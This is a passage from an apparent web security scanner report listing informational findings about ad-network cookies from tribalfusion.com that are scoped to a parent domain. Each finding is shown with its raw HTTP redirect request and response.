P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aOnh31SyZaaguIvQ9UN6ORsZbuleis79XItmZb0P8atB8OjAkU8xKhtbdD6bHZaVnI2TUCe4Zd4PpZb7wHXCZaZbPZdqZdO6mo7JbLZd3xuwbZbHN538buNduG2L81ZaY5pX32oqSqf2x7N6kcPdHSVDe06Zbo85Yn01rbZbQrwZbFpMcjDq6PZaumkobfFsGD5yHWK3SNZc9eWIZbZc53SxWq1pme8CV90Nq6CBimgf4finNqZaZdpEHlnXDX1gEuqUPhN9I1mG3QkTEldbEb2stXISNA8y56Rry2JU3teeA5JyEAAKrqMmOd64bu6BZctFcu2lR2XJSV9BoymIjg3mhHZbqWlQKoZd9NcrCiAZajj2cywhZcaGo4iX5Eo8ZaUcLRUM2p7K1A3bCDJl3AYKTXTUtTBZaZdxJABe2b1xOqBGZanyrnrybc6ZcZdJKV2mpmxtZdPHVDMtNDKEnmxaeDZaDLLyY8UNVQnSYDt2FIdJvwP5myVZaGNRTZag8; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:23:35 GMT;
Content-Type: text/html
Location:
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ANON_ID=aVnhU0pyXRGZdet4AA9JInixYy5PW6mOZbfFNupYZbk6uRZbr02dZdrXotZbHnCs1oI3CFlhZa8vWeKEqvimhNX3Kt9j892FmLPcxZbP0kaqZawEuyaivqVjqFUhZcj4jbd60Yuegve9awYnLBq2vshOZdgkA1DZbZcLZcpJQY8ZbUYZanGapYXBfGJVl72jGv4EZcXZaXWRyi8mtQ4W6vfiaYaP00ZdoU0PlIXq5bjMkliq5On18o3kCLonUhYe9hpoTXoFBZdWIdhJUkx4TMOyZaZcloOgJZbYcLyK4ZciswqdLdXU3KEohUfhMWuUnQoqdAnh6Vf9sj0qYAlGykV6VvFCBPKNSj0x9YEevGUNn4dE9YeZacKgmLZaCjTjZdcDTYmnktgn3ExYBhxsRPtF0AAIump3x0ZagZajqkUUfIQRVAEGHQGMkmwv0s9Axh8fKLSCGl7SZd9clEgUQlk7eBuNKXFs7xl2PyNaciJKwZbXnvV7hs3qclZd; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:23:46 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aVnhU0pyXRGZdet4AA9JInixYy5PW6mOZbfFNupYZbk6uRZbr02dZdrXotZbHnCs1oI3CFlhZa8vWeKEqvimhNX3Kt9j892FmLPcxZbP0kaqZawEuyaivqVjqFUhZcj4jbd60Yuegve9awYnLBq2vshOZdgkA1DZbZcLZcpJQY8ZbUYZanGapYXBfGJVl72jGv4EZcXZaXWRyi8mtQ4W6vfiaYaP00ZdoU0PlIXq5bjMkliq5On18o3kCLonUhYe9hpoTXoFBZdWIdhJUkx4TMOyZaZcloOgJZbYcLyK4ZciswqdLdXU3KEohUfhMWuUnQoqdAnh6Vf9sj0qYAlGykV6VvFCBPKNSj0x9YEevGUNn4dE9YeZacKgmLZaCjTjZdcDTYmnktgn3ExYBhxsRPtF0AAIump3x0ZagZajqkUUfIQRVAEGHQGMkmwv0s9Axh8fKLSCGl7SZd9clEgUQlk7eBuNKXFs7xl2PyNaciJKwZbXnvV7hs3qclZd; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:23:46 GMT;
Content-Type: text/html
Location: http:/pixel.quantserve.com/r
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ANON_ID=afnFkjmge0wRusnZd7gvZcatR8ZbEScUCBDXs0j0s50GZb1NZbNHr3QTUauwUM8tQU0eWCZcJwiaT9KOt0ORNDIPwt3Fos42FUhgEgkcn6gbVL7kcYVbsSviZdk498UHG7ll0UOmZaZd03oZbIohusjqYPAOg3P9l1qIXMOOyVcIdYGSRPUWps27MXI47gapuaKm0ivgosOIrnO096QZaussCUB9yqu346N7wR4whrspZaQTuAry7D0DqkWQuEMZaR6D4ZbKvKLDWR1PA8TDijB6RZdtTUZdBnYh8ux1FrrnNPB903ZctJ4lfVtpBjNHNWBwjlOdluDCCKqFZb2brZaMZdROFQhavZcTSkZdyPSbHOIZdVYOMeiosYkFhpmMgM8aIQbfHbK3G8o6QwPyQT1FryGQ8ZcM48FyrtZd8GDZc4sCV1LqZaikES5Zb1ggkhTpxsfVYrnmvEUmhbc9Yds87sZdpP1MHN80q6G6Yp1qE3IS34IhXlTBwHfMShFhrRxjZdx7ycmCBq19hfEiJSscR3Uui17SS4Za0eKOOMWnVRHQdSddDa40Pp8UaZayWOpLbvqshOIEwbP2XJRmnLmXutTHs2ViVDZb32EHl; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:38:53 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=afnFkjmge0wRusnZd7gvZcatR8ZbEScUCBDXs0j0s50GZb1NZbNHr3QTUauwUM8tQU0eWCZcJwiaT9KOt0ORNDIPwt3Fos42FUhgEgkcn6gbVL7kcYVbsSviZdk498UHG7ll0UOmZaZd03oZbIohusjqYPAOg3P9l1qIXMOOyVcIdYGSRPUWps27MXI47gapuaKm0ivgosOIrnO096QZaussCUB9yqu346N7wR4whrspZaQTuAry7D0DqkWQuEMZaR6D4ZbKvKLDWR1PA8TDijB6RZdtTUZdBnYh8ux1FrrnNPB903ZctJ4lfVtpBjNHNWBwjlOdluDCCKqFZb2brZaMZdROFQhavZcTSkZdyPSbHOIZdVYOMeiosYkFhpmMgM8aIQbfHbK3G8o6QwPyQT1FryGQ8ZcM48FyrtZd8GDZc4sCV1LqZaikES5Zb1ggkhTpxsfVYrnmvEUmhbc9Yds87sZdpP1MHN80q6G6Yp1qE3IS34IhXlTBwHfMShFhrRxjZdx7ycmCBq19hfEiJSscR3Uui17SS4Za0eKOOMWnVRHQdSddDa40Pp8UaZayWOpLbvqshOIEwbP2XJRmnLmXutTHs2ViVDZb32EHl; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:38:53 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ANON_ID=ajnEV8OleoZcRnjwsvHjIGMPZaN3BhIGlMBwRu672jEu6kFEyVYSLZaT1XZcav235PM6yOYxJ7nrJA1MZaJUHaR62pMLDiXmu3aWrqyeDnmtflYj0wfKZb8B7Fs63ZddZdZaLVDVvNPZd2W5bZcKjgRbcSf1M89J0soZcMHZdsFJhAheI56MaCY7fHT7a9KTnZbJNl1fTCrWJyPwhCGiYp6RMZa86Zd02EMBZamuDrCiQITDnnYZbOt8hgqvwhN20MjRVIkW7WfQv5tNZb2h0ZaGLZaV3IEkQQQcWCxpuaZbRNhyWSKOco13Nky6g5KAAJfjStWxe12Go03g2hZdyAZd4xfblyvbvZajoMXsA6XGV4aJMbCDx17IY4NSpXehXEowhpweWH5d1bZb4rfD1THmXLmINObC9PiJTbRfvcuIZcJ0dZbDlZax6eLfViy5qgJrYZdLWIm5mnnxUbZarx8QgQq9ChvnAOFSErQfthcKcEGJKXKoU5EuIZcZdbpEGZbZbqoFkrZaS2YrLnIOQxR581u71Q9TZc8jaZc9qZdXBpup2owIsVqZcmlqeKD9oui0xJtoO2EYE2Zbv0tIeUSVMVHYpQSRDARMp; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:37:44 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/ HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=ajnEV8OleoZcRnjwsvHjIGMPZaN3BhIGlMBwRu672jEu6kFEyVYSLZaT1XZcav235PM6yOYxJ7nrJA1MZaJUHaR62pMLDiXmu3aWrqyeDnmtflYj0wfKZb8B7Fs63ZddZdZaLVDVvNPZd2W5bZcKjgRbcSf1M89J0soZcMHZdsFJhAheI56MaCY7fHT7a9KTnZbJNl1fTCrWJyPwhCGiYp6RMZa86Zd02EMBZamuDrCiQITDnnYZbOt8hgqvwhN20MjRVIkW7WfQv5tNZb2h0ZaGLZaV3IEkQQQcWCxpuaZbRNhyWSKOco13Nky6g5KAAJfjStWxe12Go03g2hZdyAZd4xfblyvbvZajoMXsA6XGV4aJMbCDx17IY4NSpXehXEowhpweWH5d1bZb4rfD1THmXLmINObC9PiJTbRfvcuIZcJ0dZbDlZax6eLfViy5qgJrYZdLWIm5mnnxUbZarx8QgQq9ChvnAOFSErQfthcKcEGJKXKoU5EuIZcZdbpEGZbZbqoFkrZaS2YrLnIOQxR581u71Q9TZc8jaZc9qZdXBpup2owIsVqZcmlqeKD9oui0xJtoO2EYE2Zbv0tIeUSVMVHYpQSRDARMp; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:37:44 GMT;
Content-Type: text/html
Location:
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ANON_ID=aEnEV8RZdyUICr3qo3l8XsI5ZcRo6I6xjOjhQ5uKm1iiJMfM0726IXTRUYfJUghfVCXxm0yJtpZbZd4Zb0CyrAt62xxnsMkYCVHkTjYa81BxnspI042r2ZcHMnZbUE86VFBkwRJxZaRqFK0Is6t1PBbPxM0ZbHKdF8tnaoRZau5wDW3C6KR0Va0UcgJXIc39WZc71amyidGV1hxrcRRZcbMQZa0fiEDAgaNsWeAO5Ns6HfI7h5s18wR6G9pI3L8ZbAIp39dfJNlPqNUNMpERECqFd0l0wFgPb2qFkwXIjOMZawPH5LhunWZbS2AtAuqYy3gUk1lm4hb5KmhG4QDmL4pLp2YEL1LYA7hSVprpPUKPBW6rGbZdNrXeErKoKUZdyBywdZaiuyeIXJlMTCPAaPHr6dNSZcGjVLnbCtobqRmTkvKd12pbhH1oNOQxZaHYvWZdZc3mB3ZcDmDaWWSYPOq0xxQl9DUWt1dMCpNN6iwKGWYlRUJR5nnhQmWAO4rBWEIETg7AMV0RpCIrbkb4a7q4CqZc2wcrfAjA87KV0jy2H8xYZchVmIN8ZbLQZd8cNKWTr6VwjH3mDqpdQ0WFYwbh; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:37:51 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aEnEV8RZdyUICr3qo3l8XsI5ZcRo6I6xjOjhQ5uKm1iiJMfM0726IXTRUYfJUghfVCXxm0yJtpZbZd4Zb0CyrAt62xxnsMkYCVHkTjYa81BxnspI042r2ZcHMnZbUE86VFBkwRJxZaRqFK0Is6t1PBbPxM0ZbHKdF8tnaoRZau5wDW3C6KR0Va0UcgJXIc39WZc71amyidGV1hxrcRRZcbMQZa0fiEDAgaNsWeAO5Ns6HfI7h5s18wR6G9pI3L8ZbAIp39dfJNlPqNUNMpERECqFd0l0wFgPb2qFkwXIjOMZawPH5LhunWZbS2AtAuqYy3gUk1lm4hb5KmhG4QDmL4pLp2YEL1LYA7hSVprpPUKPBW6rGbZdNrXeErKoKUZdyBywdZaiuyeIXJlMTCPAaPHr6dNSZcGjVLnbCtobqRmTkvKd12pbhH1oNOQxZaHYvWZdZc3mB3ZcDmDaWWSYPOq0xxQl9DUWt1dMCpNN6iwKGWYlRUJR5nnhQmWAO4rBWEIETg7AMV0RpCIrbkb4a7q4CqZc2wcrfAjA87KV0jy2H8xYZchVmIN8ZbLQZd8cNKWTr6VwjH3mDqpdQ0WFYwbh; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:37:51 GMT;
Content-Type: text/html
Location: http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ANON_ID=aqnEV8mMZaCZdBbyppueZbhWSY41SZaxuybZaZbZc0eZaUoy3QiiYimD2HZaJAPRKjZcRl18o8yiNh2E46Y8T4VZbElOZdTZcHjEHIuULbn1r2F67PPP3h7KIRyf4KZblWgDPZblIBZaZcfm0NLJ54NZaZdxEe6qaN0HikmvKNHsq8eZdjZbOaQ7LxprGZcZd6wKQb7Zdq3RZbZdmZb5MmHIVHrej8cN00muJvOCoZcfMNxTXAoobmIteubQjBje1Y9JyFofpoXXIimJcglFJaYgV5gn0Ya4xZc3Za2pcaE7jSmvLhQ7HMKVRBKK72sitAt0PZc3mB9oUslohhmFn7JEZajUiePTkX9AoQ050H9p1HokraeDt6he9hsuRoj7qhvfLbPmJVYNwV9PNcZdqcQ7X4qQhKsyQM7YnBm8Zd1hGykCnVd1mPmWMcC3JBpfqGpqIasmUh2lWxSdFX7ZcVZalXZarSxGoMAf29QQwcm1H1Ig2ciQ22bUZbpBPjWZanxtRtaY516plSnKbZbcuQcAeATpEXEFXyclifo3RbIRIXW1mwHhnrTjFtUF02paMtuhRtM4ZaPbGxZcIgFpkhZb3ARSSKsFXBZdCm5P; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:38:20 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aqnEV8mMZaCZdBbyppueZbhWSY41SZaxuybZaZbZc0eZaUoy3QiiYimD2HZaJAPRKjZcRl18o8yiNh2E46Y8T4VZbElOZdTZcHjEHIuULbn1r2F67PPP3h7KIRyf4KZblWgDPZblIBZaZcfm0NLJ54NZaZdxEe6qaN0HikmvKNHsq8eZdjZbOaQ7LxprGZcZd6wKQb7Zdq3RZbZdmZb5MmHIVHrej8cN00muJvOCoZcfMNxTXAoobmIteubQjBje1Y9JyFofpoXXIimJcglFJaYgV5gn0Ya4xZc3Za2pcaE7jSmvLhQ7HMKVRBKK72sitAt0PZc3mB9oUslohhmFn7JEZajUiePTkX9AoQ050H9p1HokraeDt6he9hsuRoj7qhvfLbPmJVYNwV9PNcZdqcQ7X4qQhKsyQM7YnBm8Zd1hGykCnVd1mPmWMcC3JBpfqGpqIasmUh2lWxSdFX7ZcVZalXZarSxGoMAf29QQwcm1H1Ig2ciQ22bUZbpBPjWZanxtRtaY516plSnKbZbcuQcAeATpEXEFXyclifo3RbIRIXW1mwHhnrTjFtUF02paMtuhRtM4ZaPbGxZcIgFpkhZb3ARSSKsFXBZdCm5P; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:38:20 GMT;
Content-Type: text/html
Location: http:/t.mookie1.com/t/v1/clk
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aUmNQC5EY73tyM4A7JnUbZbYGvUXc3XXGnwmaZbU5U3QVUFHWP72PT33QcYpSdUM0dBsVmrp2cYVYrYATPys4AZbgQPMF4WUn0dBKpdZay3PvY4Vb7VcQdVsMeSPYyUWY3Ur7S3UaoVEYpTTBaPE3JQcjKQUIoPH7WnHRP4p/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ANON_ID=agnhF4SkTAF8iiw8fQKkDVov5ZaVtL4kAJJHuly8Q36RZdu9P8pbfCuSisKOZcKDQXiFTKbrMRNxbBWMLZc4nZcoT0pGB6BrXuUjkmNittGpjkC1xZdD9VcwQUjOl7oyFNhBoOZacm4lY8LwxcYRyGe8NT5QuZaid1S5eljpmQOJ4bQX0HdqPu0oyM7tW6LZcSZdbxkrgktqi5TrhmfRAg5KVQr6jydWeHapkSCorEY5oPPOltPZcjFH4ZcUecfVxg0mrIVGjWcQCJ7k1UAnLdnYyYE2ZccSkhge3hadCbJBYbqd17D9VI4DOSZbD8UNhRfV45JZct312BhBZaITIPBpoQBn8der0fFh4FTS6gl035o36yY73spFfW0SiTyjx0noZbZaZcQIFvxbGBf6uePjMuPtZbrfOEZbdZdsTTdqE6OpUZdBVmMdgZavYrZdcZbZbsr6DVJnXvdXZcWKCpFK8RTvU5qFce0bTXsQwsfW0ktQrmyTbRXsgHZc7; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:23:45 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h.click/aUmNQC5EY73tyM4A7JnUbZbYGvUXc3XXGnwmaZbU5U3QVUFHWP72PT33QcYpSdUM0dBsVmrp2cYVYrYATPys4AZbgQPMF4WUn0dBKpdZay3PvY4Vb7VcQdVsMeSPYyUWY3Ur7S3UaoVEYpTTBaPE3JQcjKQUIoPH7WnHRP4p/ HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
